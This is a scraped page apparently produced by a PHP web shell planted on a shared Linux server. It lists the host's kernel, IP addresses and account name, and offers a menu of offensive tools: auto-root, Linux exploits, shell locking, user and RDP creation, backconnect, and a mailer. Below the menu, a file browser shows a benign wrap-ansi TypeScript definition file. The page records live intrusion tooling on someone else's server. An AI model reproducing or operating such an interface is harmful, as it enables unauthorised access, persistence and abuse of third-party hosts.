Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
wrap-ansi /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.02
KB
-rw-r--r--
package.json
961
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for wrap-ansi 8.0 // Project: https://www.npmjs.com/package/wrap-ansi // Definitions by: Klaus Reimer <https://github.com/kayahr> // Piotr Błażejewicz <https://github.com/peterblazejewicz> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped /** * Wrap words to the specified column width. * * @param input String with ANSI escape codes. Like one styled by chalk. * @param columns Number of columns to wrap the text to. * @param options By default the wrap is soft, meaning long words may extend past the column width. Setting * this to true will make it hard wrap at the column width. */ declare function wrapAnsi(input: string, columns: number, options?: wrapAnsi.Options): string; declare namespace wrapAnsi { interface Options { /** @default false */ hard?: boolean | undefined; /** @default true */ trim?: boolean | undefined; /** @default true */ wordWrap?: boolean | undefined; } } export default wrapAnsi;
Close